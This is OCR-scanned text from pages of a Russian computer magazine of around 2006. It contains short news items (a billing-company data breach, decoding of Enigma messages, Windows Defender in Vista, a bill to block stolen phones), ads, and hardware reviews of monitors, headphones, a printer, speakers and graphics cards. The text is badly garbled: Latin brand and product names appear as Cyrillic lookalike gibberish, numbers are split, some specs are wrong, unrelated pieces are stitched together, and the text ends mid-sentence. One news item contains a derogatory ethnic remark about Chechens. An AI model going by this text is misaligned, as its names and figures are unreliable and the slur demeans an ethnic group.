работу со всеми извращенскими 
ресурсами. А теперь и новый скан- 
дал. Стало известно, что систему 
взломали хакеры и стащили инфу 
о 1 7-ти миллионах ее пользо- 
вателях: телефонные номера, 
адреса, емейлы, айпишники, 
информацию о кредитках и т.д. 
Факт взлома обнаружили сотруд- 
ники Зесиге Зсіепсе Согрогаііоп, 
которые наткнулись в инете на 
сайт фишеров с базой данных 
клиентов ІВІІІ. О своей находке они 
тутже сообщили ФБР. Конечно, 
происшедшее не пошло на пользу 
репутации биллинговой конторы. 
Пользователи ІВІІІ возмущены, что 
никто не удосужился известить 
их о взломе, и никто не знает, как 
воспользуются хакеры получен- 
ной инфой. Кстати, а тебя нет в той 
базе :)? 



Распределен- 
ные системы 
против Второй 
мировой 

Если ты читал учебники по исто- 
рии Второй мировой, то должен 
знать, что все важные сообщения 
передавались командованию в 
зашифрованном виде. Причем 
не в духе: «Ласточка, ласточка, 
это бобер. Птичка вылетела с 
орешком в клюве — направляет- 
ся в скворечник», ас помощью 
технических систем кодирования. 
Одним из самых надежных считал- 
ся шифр, составленный на немец- 
кой машине «Энигма». В 1942-м 
году нашим удалось перехватить 
3 сообщения, зашифрованных 
этой машиной. Тогда техника не 
позволяла раскрыть тайну этих 
посланий, и только с 1995-го года, 
когда сообщения были опублико- 
ваны историком Ральфом Эрски- 
ном, ими заинтересовались вновь. 
Специально для дешифровки 
кода «Энигмы» был создан проект 
М4, но потребовалось более 1 0 
лет, чтобы с помощью распре- 
деленных вычислений добиться 
положительного результата. 20-го 
февраля 2006-го года компьютер- 
щикам удалось расшифровать 
первое из посланий, поступившее 
от капитана немецкой подлодки 
«II». Второе было декодировано 
в прошлом месяце и содержало 
следующий текст: «По курсу 
конвоя 55 градусов ничего не 
обнаружено, направляюсь в ука- 
занный квадрат. Позиция АЛ 3995. 
(Ветер) юго-восточный, (сила) 4, 
волнение (моря) 3,10/10 облачно, 
(барометр) (1 0) 28 миллибар (и) 
повышается, туман, видимость 1 
морская миля». Остается третье 
письмо, над которым продолжают 
биться участники проекта. Поже- 
лаем им удачи. 



МІСК080ЕТ 
СОБИРАЕТ- 
СЯ ВКЛЮ- 
ЧИТЬ В 
СВОЮ НО- 
ВУЮ ОС 
\УШВО\Ѵ8 
ѴІ8ТА ПРИ- 
ЛОЖЕНИЕ 
\УШИО\Ѵ8 
БЕЕЕИБЕК, 
СПОСОБ- 
НОЕ СПРА- 
ВИТЬСЯ С 
ЛЮБЫМИ 
ВИРУСАМИ, 
ЧЕРВЯМИ, 
ТРОЯНАМИ 
И ШПИОН- 
СКИМ СОФ- 
ТОМ. 




Вымирание 

антивирусных 

компаний 



За долгие годы ты привык пола- 
гаться на свой верный антивирус 
и файрвол, скачивать свежие 
обновления и с помощью филь- 
тров блокировать опасные порты. 
Но вполне возможно, что скоро 
придется проститься с верными 
охранниками. Дело в том, что 
Місгозоіі собирается включить 
в свою новую ОС ѴѴіпбоѵѵз Ѵізіа 
приложение ѴѴіпбоѵѵз Эеіепбег, 
способное справиться с любыми 
вирусами, червями, троянами и 
шпионским софтом. По мнению 
аналитиков компании, оно ничем 
не будет уступать решениям от 
известных антивирусных брендов. 
Т акже в плане защиты Ѵізіа ждут 
новые фишки: система будет 
загружаться изначально с ограни- 
ченными привилегиями, запре- 
щающими установку программ. 
Если тебе захочется проинстал- 
лить новую софтину, придется 
вручную переключить систему 
в режим администрирования. 
Іпіегпеі Ехріогег, без специального 
разрешения не сможет сохранять 
файлы в другие директории, кро- 
ме ТЕМР. Новость про дефендер 
вызвала печальные эмоции у АІее, 
Зутапіес, Тгепб Місго и других 
компаний, которые на защите 
пользовательских компов имеют 
свой хлеб. Но независимый ана- 
литик Джон Поскаторе считает, 
что рынку антишпионского ПО 
с выходом Висты не настанет 
каюк. По крайней мере, первые 
несколько месяцев. Ведь многие 
пользователи так привыкли 
доверять знакомым брендам! Но 
то, что оборот таких программ 
значительно снизится, — с этим не 
поспоришь. 




В 1942 ГОДУ 
НАШИМ УДА- 
ЛОСЬ ПЕРЕ- 
ХВАТИТЬ 
3 СООБЩЕ- 
НИЯ, ЗА- 
ШИФРОВАН- 
НЫХ ЭТОЙ 
МАШИНОЙ. 
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Шоколадный батончик «ШОКХХІ_» приготовил необычный подарок для всех почита- 
телей видеоигр. С 25-го апреля по 30-е июня 2006-го года по двенадцати крупней- 
шим городам России будут колесить мобильные геймерские площадки. Внутри 
огромных грузовиков с логотипом «КИБЕР 20ІЧА» развернутся стилизованные под 
космический корабль игровые полигоны, где с комфортом смогут разместиться две 
команды по 8 человек. 

Любой желающий, предъявив обертки от «ШОКХХІ_», сможет попробовать свои 
силы в гонке ѴѴіреОиі Риге на консоли РЗР. На большой ЖК-панели зрители увидят 
фрагменты этих футуристических гонок и результаты лучших заездов. Основная 
борьба развернется за новенькие приставки Р8Р, которые достанутся победителям 
финальных гонок в конце дня. 

Ищите уникальные киберспортивные грузовики в вашем городе! Вы узнаете их по 
надписи на борту: «КИБЕР 20І\ІАШ0КХХІ_. ДОСТУП РАЗРЕШЕН». Скоро мобильные 
геймерские площадки будут в твоем городе: в Москве, Санкт-Петербурге, Екате- 
ринбурге, Ростове-на-Дону, Нижнем Новгороде, Челябинске, Волгограде, Казани, 
Новосибирске, Самаре, Уфе и Омске! Время и места дислокации игровых полиго- 
нов на колесах можно узнать на сайте ИДр://ѵѵѵѵѵѵ.зИок-ххІ.ги . из афиш около школ и в 
компьютерных клубах. 




Безработные мобильники 

Пока в США придумывают тупые законы, у нас вводят впол- 
не логичные. Уверен, что ты, как среднестатистический 
россиянин, теряешь по 10 мобильников в год. Да, непри- 
ятно, но еще неприятнее осознавать, что твоим родным 
телефончиком, который ты холил и лелеял долгое время, 
теперь пользуется какой-то бородатый чечен в своих 
чеченских целях. Ничего, друг, скоро этому безобразию 
настанет конец. Г осдума сейчас рассматривает законо- 
проект, согласно которому ворованные трубки не будут 
работать в сотовых сетях. Если ты где-то прошляпишь 
свою нокию, или у тебя спионерят ее в метро, то тебе стоит 
только заявить о пропаже, и ее данные будут занесены в 
базу. Базу передадут сотовым операторам, и те отключат 
мобилку от своей сети. Закон этот не появился из ниоткуда: 
в последнее время в России участились кражи мобил, 
которые воришки могут толкнуть на сторону без малейших 
проблем. Поскольку каждый мобильный телефон имеет 
свой Ю, состоящий из 15 цифр, благодаря такой базе мож- 
но обнаружить повторное подключение и вычислить нового 
владельца. Если авторы законопроекта окажутся правы, и 
с его выходом сбыть паленый товар станет сложнее, то это 
наверняка снизит количество краж. Что есть гуд. 




Ваш ПК способен успевать за 
Вашими потребностями. 
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БОЛЬШЕ ДЮЙМОВ! / І.С019 

Шехтман Александр, ІезНаЬ (ІезПаЬ@датеІапсІ.ги) 



Кто из нас не любит посмотреть кино или поиграть в игры, развалившись перед большим экраном? Раньше такое 
было возможно только при покупке дорогостоящего оборудования. Но времена меняются, и уже сейчас почти 
каждый юзер может обзавестись отличным ЖК-монитором с широким экраном. В этом тесте мы рассмотрим ряд 
таких девайсов, различающихся как по функциям, так и по назначению. 



Методика 

тестирования 



Начинали мы с одного из самых главных параметров — 
времени отклика пикселя. Для этого с помощью прог- 
раммы ТРТІезІ на экран выводился черный фон, по кото- 
рому двигался белый квадрат. Если латентность высо- 
кая, то его край начинал размываться или же появлялся 
шлейф. Чем меньше шлейф, тем лучше. 

Цветопередача проверялась с помощью колориметра. 
Специальная программа подает на монитор последова- 
тельность цветовых сигналов и с помощью датчика опре- 
деляет, насколько правильно они отображаются на экра- 



не. На основе сравнения строится диаграмма, из которой 
можно судить о качестве выводимых оттенков. В идеале 
графики должны совпасть в одну прямую, проходящую под 
углом 45 градусов. Любое отклонение от этой прямой пока- 
зывает недостатки отображения цветов. 

Для проверки яркости и контрастности мы сначала выкру- 
чивали их на максимум, а затем снижали до минимума, и 
чем шире получался диапазон, тем лучше. Затем оценива- 
лась засветка матрицы. Мы выводили на весь экран чер- 
ный цвет и смотрели, нет ли белесых разводов по углам. 



Совет ^ ■ 

На матрицах некоторых мониторов встречаются так называемые «битые пиксели». Они представляют собой черные, 
белые или другого цвета точки, никогда не меняющие свой цвет. Наличие нескольких таких пикселей у некоторых 
фирм не является условием для гарантийного ремонта или обмена, так что при покупке обязательно обрати на это 
внимание. Хотя многие известные компании на сегодняшний день гарантируют отсутствие таких пикселей. 

Вывод 



Из теста видно, что многие из рассмотренных устройств 
подходят для совершенно разных задач, так что здесь 
тебе придется во многом ориентироваться на свои лич- 
ные нужды. И тем не менее все они в наибольшей сте- 
пени подойдут для игр и видео, так как для других видов 
деятельности такая большая диагональ не дает каких- 



то заметных преимуществ. Теперь время расставить 
оценки: «лучшую покупку» получил Затзипд 970р за 
выдающийся дизайн и хорошее качество изображения, 
а «выбора редакции» был удостоен СТХ Р972 за вели- 
колепную эргономику, функциональную насыщенность 
и отличную картинку. 



ТезІЧаЬ выражает благодарность за предоставленное на тестирование оборудование компаниям: АЛИОН (т.(495)727-1818, \ллллл/.аІіоп.гіО , 
Графитек ЛллллллагайТес.гШ . а также российским представительствам компаний Рохсопп, М8І, СІпаіпіесІп, Согзаіг, пѴісІіа и АТІ, 





Урезанный вариант своего старшего собрата — 
это касается эргономики и дизайна, но не качест- 
ва изображения. Латентность матрицы средняя: 
за движущимся квадратиком заметен шлейф, но 
размер его все же небольшой. Яркости и контра- 
стности вполне достаточно для любого вида дея- 
тельности. Колориметрические графики ровные, 
но в середине диапазона они заметно расходят- 
ся. Этот монитор единственный в обзоре, у кото- 
рого плохо работает автоматическая настройка 
изображения при работе с аналоговым входом 
(Э-ЗІІВ): картинка смещается примерно на санти- 
метр влево за каемку экрана, а шрифты становят- 
ся размытыми. Это все можно исправить вручную, 
что не требует времени. Меню хорошо визуализи- 
ровано и снабжено русскими подписями, но орга- 
низовано несколько неудобно и при переходах 
между опциями наблюдается некоторая затормо- 
женость. К тому же кнопки на панели управления 
нажимаются тяжеловато. К нашему удивлению, из 
интерфейсов присутствует только аналоговый Э- 
ЗІІВ, что нехарактерно для устройств подобного 
класса и не встречается ни у одного из рассмот- 
ренных конкурентов, а вмонтированный одним 
концом в корпус шлейф затрудняет установку мо- 
нитора. Имеются встроенные колонки, но их ди- 
намики направлены вниз, что несколько ухудшает 
качество звучания. Тем не менее для саундтреков 
к фильмам его будет вполне достаточно (если не 
включать слишком громко, иначе может возни- 
кать дребезжание). К сожалению, громкость ре- 
гулируется только из меню — отдельных кнопок 
не предусмотрено. В качестве особенности мож- 
но отметить наличие ручки для переноски. 



Пожалуй, самый стильный девайс в обзоре: все уг- 
лы сглажены, корпус выполнен из белого блестя- 
щего и серебристого пластика, продолговатая 
кнопка включения подсвечивается синей лампоч- 
кой. Сразу же отметим потрясающую «гибкость» 
девайса: кронштейн, соединяющий станину и эк- 
ран, снабжен тремя шарнирами, в то время как кон- 
куренты могут похвастаться максимум двумя. Ко 
всему прочему все кабели подключаются не непос- 
редственно к станине, а к специальному выносному 
модулю, подсоединенному к корпусу небольшим 
кабелем, — такая компоновка позволяет жесткому 
шлейфу ЭѴІ-Э не перекручиваться. Есть разворот в 
режим «портрет» и даже на 180 градусов. Все это 
делает возможным размещение монитора практи- 
чески в любом месте без особых проблем. Что ка- 
сается качества изображения, то тут ситуация дво- 
якая. С одной стороны, хорошая цветопередача: 
графики ровные, без скачков, правда, в середине 
видно расхождение. Углы обзора, пожалуй, самые 
большие в тесте и даже проблема резкого ухудше- 
ния качества картинки при отклонении вниз практи- 
чески отсутствует. Яркость по всей поверхности эк- 
рана равномерная, что также не может не радо- 
вать. С другой стороны, время отклика пикселя ве- 
ликовато: за движущимися предметами остается 
заметный шлейф, который к тому же меняет свой 
цвет на красный. Это особенно заметно при прок- 
ручивании текста и везде, где перемещающийся 
объект и фон сильно контрастируют (фильмы, ЗЭ- 
шутеры). Огорчает отсутствие меню как такового: 
скорее всего, им пожертвовали в пользу стиля — 
кнопки на передней панели изрядно попортили бы 
вид. Однако в комплекте есть программа, обладаю- 
щая всеми функциями меню. Не радует и отсут- 
ствие отдельного аналогового входа: О-ЗІІ В можно 
подключить к ОѴІ только посредством специально- 
го шнура, который идет в комплекте. 



Очередной широкоэкранник — на этот раз от небе- 
зызвестной фирмы ѴіеѵѵЗопіс. У него наблюдаются 
некоторые аномалии с латентностью матрицы — 
движущийся по черному экрану белый квадратик 
в левом нижнем углу оставляет заметный след, чего 
не видно на всей остальной поверхности. Эта осо- 
бенность хорошо заметна при просмотре кино: 
в этом углу движущиеся объекты сильнее размыва- 
ются. Примерно такая же ситуация складывается 
и с яркостью. Только тут неравномерность во всем 
нижнем крае (скорее всего, это особенность конк- 
ретного экземпляра, однако это доказывает, что при 
покупке любого монитора стоит требовать от про- 
давца подключить дисплей и прогнать на нем прос- 
тенький графический тест). Очень хорошая цветопе- 
редача: линии почти совпадают и на них нет никаких 
сколько-нибудь заметных перепадов (по этому пока- 
зателю ѴіеѵѵЗопіс ѴА1912ѵѵ дал фору всем протести- 
рованным устройствам). Есть недостаток яркости 
и контрастности — оба этих параметра имеют невы- 
сокие максимальные значения, а значит, играть в 
темные игры будет не очень удобно. Весьма непло- 
хие углы обзора: при смещении вниз картинка начи- 
нает блекнуть не так быстро, как у некоторых конку- 
рентов. Элементы управления сделаны качественно: 
меню хорошо визуализировано и навигация по нему 
удобная. Немного расстраивает отсутствие русского 
языка. Настроить яркость и контрастность можно с 
помощью отдельных кнопок, а вот для громкости та- 
кой функции не предусмотрено, хотя этот параметр 
нужно менять гораздо чаще. Огорчает отсутствие 
выхода Міпі Заек, так что, если ты хочешь подклю- 
чить наушники и мониторные колонки, тебе придет- 
ся покупать разветвитель. Все интерфейсы спрята- 
ны в небольшое углубление, которое можно закрыть 
специальной крышкой, но отверстие для шлейфов в 
ней слишком маленькое, так что при неосторожном 
движении она может вылететь. 



А81І8 РѴІИ91 



ВЕЫО РР93СХ 



СТХ Р972 




Этот монитор специально предназначен для люби- 
телей кино. Время отклика пикселей небольшое, 
что является немаловажным фактором, так как 
движущиеся объекты будут отображаться коррект- 
но. Контрастность и яркость обладают высокими 
максимальными значениями и могут изменяться в 
широком диапазоне, что особенно хорошо для ра- 
боты в помещениях с большим количеством све- 
тильников. Выявились некоторые проблемы с за- 
светкой матрицы: при выведении черного цвета во 
весь экран в нижней и верхней его части видны бе- 
лые разводы. Нет проблем с углами обзора — 
лишь при сильном отклонении вниз картинка мерк- 
нет. Матрица имеет бликующее покрытие, поэтому 
девайс надо будет располагать так, чтобы на него 
падал только отраженный рассеянный свет — в 
противном случае глаза будут сильно уставать. 
Сильно отражает и корпус, на котором хорошо за- 
метна пыль. По бокам экрана расположены колон- 
ки, показавшие относительно хорошее качество 
звука — для фильмов и игр его будет вполне дос- 
таточно, но для музыки может и не хватить. Управ- 
ление параметрами АЗЕІЗ РМ191 осуществляется 
с помощью сенсорных кнопок, расположенных в 
правом нижнем углу передней панели и эффектно 
подсвечивающихся оранжевыми светодиодами. 
Навигация по меню удобная, количество опций ве- 
лико, но переходы между ними осуществляются с 
некоторыми задержками. Из интерфейсов присут- 
ствуют Э-ЗІІВ и ЭѴІ-Э, что на данный момент явля- 
ется стандартом для устройств данного класса. 
Корпус может двигаться вверх-вниз относительно 
стола и крутиться почти во всех плоскостях, но ес- 
ли сильно подать его вперед и наклонить, то его 
положение будет неустойчивым, и монитор может 
упасть. Есть возможность разворота в «портрет» 
(для более удобной работы с текстами рсІТ и верти- 
кальными фото). 



В отличие от предыдущего девайса этот обладает 
стандартным экраном с разрешением 1280*1024. 
В ВЕЫО ЕР93ЭХ применена технология ЭТО, поз- 
воляющая уменьшать время отклика пикселей аж 
до 2-х миллисекунд (кстати, в меню предусмотрен 
пункт включения/выключения ОТО)! Визуальный 
тест и вправду показал неплохой результат: дви- 
жущийся квадратик не размывается вовсе. Яр- 
кость изменяется в широком диапазоне, но если 
ее выставить на максимум, то цвета начнут «выго- 
рать» (например, зеленый будет становиться 
желтоватым, синий — голубым и так далее). Цве- 
топередача на стандартных установках оказалась 
средней: колориметрические графики неровные, 
в начале видны резкие переходы, а в середине 
заметно расходятся. Если вывести черный цвет 
во весь экран, то справа и слева на нем будут 
видны белесые разводы, что говорит о неравно- 
мерности засветки матрицы. Особенно они за- 
метны в «темных» играх или фильмах. Не самые 
лучшие углы обзора: при отклонении от централь- 
ной оси вправо или влево картинка начинает 
блекнуть, а если сместиться вниз, то цвета стано- 
вятся, как на негативе (если будешь в компании 
смотреть кино, то у тех, кто будет сидеть не пря- 
мо перед экраном, изображение будет не самым 
лучшим). Меню сделано хорошо, все опции на 
русском языке и навигация весьма удобная. Уп- 
равление яркостью и контрастностью выведено 
на отдельные кнопки. Помимо стандартных наст- 
роек, имеется функция і-кеу, позволяющая более 
качественно настроить изображение. Работает 
она только если ВЕЫО ЕР93СІХ подключен к ана- 
логовому входу (для работы ЭѴІ специально 
подстраиваться не требуется — все и так хорошо 
видно). Экран можно вращать только в вертикаль- 
ной плоскости, но на большие углы, что очень 
удобно при использовании девайса в качестве де- 
монстрационной панели. 



Один из самых лучших девайсов в обзоре: ла- 
тентность матрицы незаметна даже на самых 
быстрых объектах, колориметрические графики 
ровные, никаких сильных перепадов нет, рас- 
хождение между линиями слабое, что говорит о 
хорошем воспроизведении оттенков. Немного 
подводит яркость — ее максимальное значение 
все же не велико, так что работать в светлых по- 
мещениях будет несколько неудобно. В то же 
время засветка матрицы равномерная — не- 
большие дефекты видны лишь при детальном 
рассмотрении. Углы обзора большие, но при 
отклонении вниз картинка все же тускнеет, 
впрочем, это видно почти на всех устройствах в 
тесте. Меню достаточно подробное и хорошо 
визуализированное, но вот навигация по нему 
несколько неудобна — слишком много нажатий 
кнопок требуется для переходов по опциям. СТХ 
Р972 стильный и при этом эргономичный: кор- 
пус имеет серебристую поверхность и только 
каемка экрана — серую. Станина выполнена из 
металла, что придает девайсу особый статус. 
Кнопка вкл/выкл подсвечивается синим свето- 
диодом, который отлично смотрится, но может 
отвлекать во время работы. Матрицу можно вра- 
щать практически во всех плоскостях: стандарт- 
ные повороты вправо/влево и вверх/вниз, в ре- 
жим «портрет». И что самое главное — ее мож- 
но приподнимать или опускать относительно 
стола, так что не важно, высокое у тебя кресло 
или нет — в любом случае положение экрана 
можно настроить точно под себя. Имеются 
встроенные колонки, показавшие не самый луч- 
ший результат, так как динамики направлены 
вниз, из-за чего звук получается глуховатым. К 
сожалению, громкостью можно управлять толь- 
ко из меню, да и отсутствие разъема для науш- 
ников или выносных колонок слегка портит впе- 
чатление. 






Веуегсіупатіс ОТХ 700 

Модель: РТХ 700 

Тип: мониторные наушники 

Оформление: динамические, открытые 

Частотный диапазон: 1 0 — 22000 кГ ц 

Чувствительность: 1 07 Дб 

Импеданс: 32 Ом 

Максимальная мощность: 1500 мВт 

Длина шнура: 3 м 

Вес: 80 г 

Дополнительно: переходник 3,5мм/6,3мм 



Известная немецкая компания Веуегсіупатіс представляет бюджетную модель 
мониторных наушников ОТХ 700. Дорогостоящие наушники этой компании 
всегда славились отменными по прозрачности и воздушности «верхами». Пос- 
мотрим и послушаем, что ей удалось сохранить в относительно экономичной 
модели. С виду конструктив наушников кажется хлипким и непрочным. Одна- 
ко, если относиться к ним бережно, они без проблем проживут не один год. По- 
садка на голове достаточно удобная. Прорезиненное оголовье не сдавливает 
голову, а мягкие амбушюры не напрягают уши при многочасовом прослушива- 
нии. Теперь перейдем к оценке качества звучания представленных головных 
телефонов. Оно сопоставимо с моделями этой же ценовой категории. Если 
описывать субъективные впечатления от прослушивания в общих чертах, то 
звучание показалось несколько замыленным, с недостатком самых низких 
частот. В инструментальной музыке наблюдается явное преобладание сред- 
них частот и некоторая потеря детальности звуковой палитры. Звучание от- 
дельных классических композиций можно охарактеризовать как достойное. В 
целом же опять ощущается нехватка глубины звука. Приятно удивило доста- 
точно хорошее звучание электронной бгит&Ьазз музыки. Несмотря на то, что 
этот стиль музыки предъявляет серьезные требования к глубине бас-звучания 
и звуковой атаке наушников, эта модель продемонстрировала весьма достой- 
ный звук на тестовых композициях. Но лучше всего устройство позволяет 
воспроизводить тяжелую рок- и альтернативную музыку. Именно в этом музы- 
кальном стиле тестируемые наушники лучше всего раскрываются высокие 
частоты. Учитывая низкий импеданс и высокую чувствительность наушников, 
их без каких либо трудностей «раскачает» любая портативная техника, а мак- 
симальная мощность в 1,5 Вт позволит без опасений подключать уши к стаци- 
онарной бытовой аудиосистеме. В целом, несмотря на некоторые недостатки 
звучания, эту модель можно смело порекомендовать всем тем, у кого нет лиш- 
них $150 — 200 на дорогие аудиофильские наушники. Для озвучивания игр и 
непредвзятого прослушивания любимых музыкальных композиций наушники 
Веуегсіупатіс ЭТХ 700 могут стать вполне достойным выбором. 



Ьехтагк Р450 

Технология печати: электротермическая струйная 

Разрешение (при цветной печати), сірі: 4800x1200 

Размер бумаги (максимальный), мм: 1 00x1 50 

Интерфейсы: Ц5В, РісІВгісІде, ВІиеТооІГі (требуется дополнительный адаптер) 

Поддержка карт памяти: СотрасІРІазІп І/ІІ, ЗтагІМесІіа, Зопу Метогу Зііск, Метогу Зііск Рго, 

Метогу Зііск Рио, Метогу Зііск Рио Рго, ЗР, МіпіЗР, ММС, хР 

Дополнительно: запись СР и печать с СР, печать без полей, редактирование изображений 

Габариты, мм: 153x276x235 

Вес, кг: 2,95 



Устройство, обладающее широким набором функций (пригодится тем, 
кто много работает с фотографиями) выпустила компания І_ехтагк. Это 
небольшой фотопринтер, который может существовать в полной авто- 
номии от компьютера. Это из-за того, что свою основную задачу, то 
есть печать фотографий, он может выполнять напрямую с тех уст- 
ройств, на которых они хранятся, обходясь без компьютера-посредни- 
ка. Для этого 1_ехтагк Р450 поддерживает стандарт РісІВгісІде, имеет 
кардридер для прямой печати с соответствующих фотоаппаратов, спо- 
собный работать с картами наиболее распространенных форматов, а 
также в него встроен пишущий СЭ-привод (СЭ-Р). Если ты живешь по 
принципу «Долой провода!», то тебе понравится возможность подклю- 
чения к принтеру ВІиеТооІН-адаптера и последующей работы по этому 
стандарту. Помимо такого изобилия совместимых носителей, этот прин- 
тер может похвастаться небольшим ЖК-экраном, который помогает 
пользователю управлять устройством, а также проводить небольшую 
предпечатную подготовку фотографий: устранение эффекта красных 
глаз, поворот кадров, коррекция цвета, кадрирование. Меню у принте- 
ра довольно простое: шесть кнопок управления и цветной интерфейс 
на экране помогают разобраться в нем довольно быстро. Ты почти сра- 
зу начинаешь понимать, как распечатывать фотки, изменять настройки, 
редактировать изображения и как копировать данные с флешки на СЭ, 
или наоборот (такая функция тоже присутствует). В комплект поставки 
принтера входит все необходимое для работы, включая и пачку фотобу- 
маги. Разобравшись с меню, пускаем ее в дело. Результат не разочаро- 
вывает: вставленный носитель быстренько сканируется принтером на 
предмет изображений, далее следует их просмотр и выбор тех, кото- 
рые следует напечатать. Скорость печати вполне приемлемая (это, 
впрочем, и не удивительно — максимальный размер бумаги невелик), а 
вот качество заслуживает всяческих похвал: цвета яркие и сочные, от- 
печаток получается четким и красивым. Так что для домашней фотола- 
боратории это устройство вполне подойдет. 
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Сепіиз 5ѴѴ-І2.1 1100 

Технические характеристики: 

выходная мощность: сателлиты — 2x5 Вт, сабвуфер — 1 8 Вт 
Дополнительно: проводной ПДУ 



Компания Оѳпіиз решила выпустить свою новую звуковую систему 
с упором на современный дизайн. Безупречно белый цвет, круго- 
вое колесо на пульте управления, которым регулируется звук, — 
все это будет напоминать тебе о том, что сейчас является этало- 
ном. Нам предлагается оценить непревзойденный звук, который бу- 
дут активно выдавать 2 стильных сателлита и сабвуфер. Суммар- 
ная мощность системы равна 28 Вт, из которых по 5 Вт приходится 
на колонки, а оставшиеся 18 — на сабвуфер. Приятным дополне- 
нием является пульт дистанционного управления, который хоть и 
подключен проводом, но позволяет на расстоянии включать систе- 
му и управлять громкостью, для чего имеется поворотный регуля- 
тор. Во время работы ПДУ будет приятно подсвечивать простран- 
ство синим светодиодом. К сожалению, не предусмотрена регули- 
ровка низких и высоких частот. Пульт служит также удлинителем, к 
которому можно подключить наушники и любое устройство с ли- 
нейным выходом. Таким образом, ты можешь реализовать неболь- 
шой музыкальный центр на базе своего СО-плеера и этой системы. 
Теперь рассмотрим Оепіиз 5ѴѴ-І2.1 1100 в работе. Сабвуфер, вы- 
полненный из дерева, имеет все шансы выдавать глубокие низы — 
это мы проверим позже. А вот сателлиты основаны на небольших 
динамиках-пищалках, которые не смогут выдать «хороших» сред- 
них частот. Довольно тонкие и, безусловно, стильные, они имеют по 
два динамика. На изгибающейся металлической ножке колонки от- 
лично будут смотреться рядом с тонким ЖК-монитором. Несмотря 
на отсутствие возможности раздельной частотной регулировки, 
при прослушивании композиций существенных недостатков выде- 
лить не удалось. При достаточно громком звучании сабвуфер чест- 
но отрабатывал низкие частоты без запирания, а колонки справля- 
лись со своей основной задачей. При разных уровнях громкости не 
было никаких западаний звука и не наблюдалось шипения малень- 
ких динамиков. Во время просмотра фильма или игры стоит поду- 
мать о соседях, так как сабвуфер, установленный на полу, будет 
выдавать глубокое уханье. Впечатление от прослушивания на 
Оепіиз 8ѴѴ-І2.1 1100 насыщенных композиций хорошее. Приятно и 
то, что производитель позаботился о простоте подключения: пере- 
путать провода будет непросто, а дополнительный кабель для сое- 
динения с выходом аудио- или СО-плеера будет очень кстати. 



М8І 



ІппоѵаИоп шіІТі Біуіе' 



Новое Поколение Видеокарт 

Исключительное Качество Изображения 





Эксклюзивно от МЗІ!!! 

Технология Динамического Оверклокинга 



ЫХ7900БТХ-ТЕ051ЕЕ 




• 24 пиксельных конвейера 

• Движок ІМѴЮІА® СіпеРХ™ 4.0 

• Память 512МЬ ООВЗ 

• Интерфейс РСІ-Ехргезз 

• Частота ядра: 650 МНг 

• Частота памяти: 1600МН2 

• Технология ІМѴЮІА® ШгаЗІіасІоѵѵ™ II 

• Технология НідТі Оупатіс-Вапде (РЮВ) ІідТіІіпд 



ЫХ7900ЕТ-Т20256Е 




• 24 пиксельных конвейера 

• Движок ІМѴЮІА® СіпеРХ™ 4.0 

• Память 256МЬ ООВЗ 

• Интерфейс РСІ-Ехргезз 

• Частота ядра: 450 МНг 

• Частота памяти: 1320МН2 

• Технология ІМѴЮІА® ШгаЗІіасІоѵѵ™ II 

• Технология Нідіі Оупатіс-Вапде (РЮВ) Іідііііпд 



ЫХ7600БТ-Т0256Е 




• 12 пиксельных конвейера 

• Движок ІМѴЮІА® СіпеРХ™ 4.0 

• Память 256МЬ ООВЗ 

• Интерфейс РСІ-Ехргезз 

• Частота ядра: 560 МНг 

• Частота памяти: 1400МН2 

• Технология ІМѴЮІА® ШгаЗІіасІоѵѵ™ II 

• Технология НідИ Оупатіс-Вапде (РЮВ) ІідРіІіпд 
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РаІіІ СеГогсе 6800С8 Зирег 



Ріехіог РХ755А 



Интефейс: РСІ Ехргезз 

Ядро: ІЧѴІРІА NN/42 

Количество пиксельных конвейеров, шт: 12 

Шина памяти, бит: 256 

Объем памяти, Мб: 512 

Частота ядра, МГ ц: 485 

Частота памяти, МГц: 1 300 

Тип памяти: ОРРВ-3 

Выходы: РѴІ, Р-5иЬ, 5-Ѵібео 



ТЕСТОВЫЙ СТЕНД 

Процессор, МГц: 2420, АМР АІІіІоп 64 3500+ 

Материнская плата: Віозіаг ТГогсе 6100-939 (ІЧѴІРІА ОеРогсе 6100) 

Память, Мб: 2x512 Согзаіг РРВ400 СІ_2,5 

Кулер: ОІасіаІТесІі Ідіоо 7200 Рго 

Жесткий диск, Гб: 2x80, Зеадаіе 7200грт 

Блок питания, Вт: 520, РоѵѵегМап Раѵоигііѳ 



Интерфейс: ІРЕ/АТАРІ 

Объем буфера: 2 МБ 

Время доступа: <100мс (СР), <150мс (РУР) 

Скорости чтения: 16х (РУР), 48х (СР) 

Скорости записи: 

СРВ: 48х СР-ВѴѴ: 24х РѴР±В: 16х РѴР+ВѴѴ: 8х РѴР-ВѴѴ: 6х РѴР+В РІ_: Юх РѴР-В РІ.: 6х 

Поддерживаемые стандарты СР: 

СР-РЮМ ХА, Аисііо СР, Раіа СР, Рііоіо СР, Ѵісіео СР, СР-І, СР-І Веасіу, МіхесІ СР, СР-ЕхІга, 

МиШ-Зѳззіоп СР, Раскеі ѴѴгііе СР, НуЬгісІ СР, ВооІаЫе СР 

Поддерживаемые стандарты РУР: 

МиШ-ВогсІег, МиШ-Зеззіоп, РѴР-ѴВ, РѴР+ѴВ, РѴР+МВѴѴ, РВТ-РМ 



ТЕСТОВЫЙ 

Процессор: АМР АШІоп 64 3000+ @ 2300 МГц 

Материнская плата: Ерох 9ІЧРА+ 

Память: 2 х 1024МВ РРВ510 Согзаіг ХМ5 РВО (3-3-3-6-1Т) 

Жесткий диск: 120СВ ѴѴР Саѵіаг ЛЗ 

Блок питания: Іпѵѵіп 430ѴѴ 



РЕЗУЛЬТАТЫ ТЕСТОВ 
ЗРМагк’ОЗ, баллы: 1 3254 
ЗРМагк’05, баллы: 5942 
ЗРМагк’06, баллы: 2670 
Оиаке 4, РРЗ: 77.8 
РагСгу, РРЗ: 132.11 
Роот 3, РРЗ: 92.7 
НаІМіТе 2, РРЗ: 112.86 



Ищешь видеокарту с оптимальным сочетанием цены и производительности? 
Возможно, тебе подойдет модель Раііі ОеРогсе 680005 Зирег, сочетающая 
в себе неслабую мощь и функциональность, которых вполне хватит для гря- 
дущих игр, использующих ЗИабег МобеІ 3.0 и эффекты НОВ. 

Комплектация вполне стандартна для платы такого уровня: драйвера, 
плеер СуЬегІіпк РоѵѵегЭѴЭ, игра СопЯісІ: СІоЬаІ Зіогт, пара кабелей и ма- 
нуал. Само же устройство выглядит интересней. Во-первых, вместо рефе- 
ренсной системы охлаждения здесь использован кулер собственной раз- 
работки, который, впрочем, несильно отличается от стандартного. А если 
быть точнее, то это обыкновенное сочетание медного радиатора и венти- 
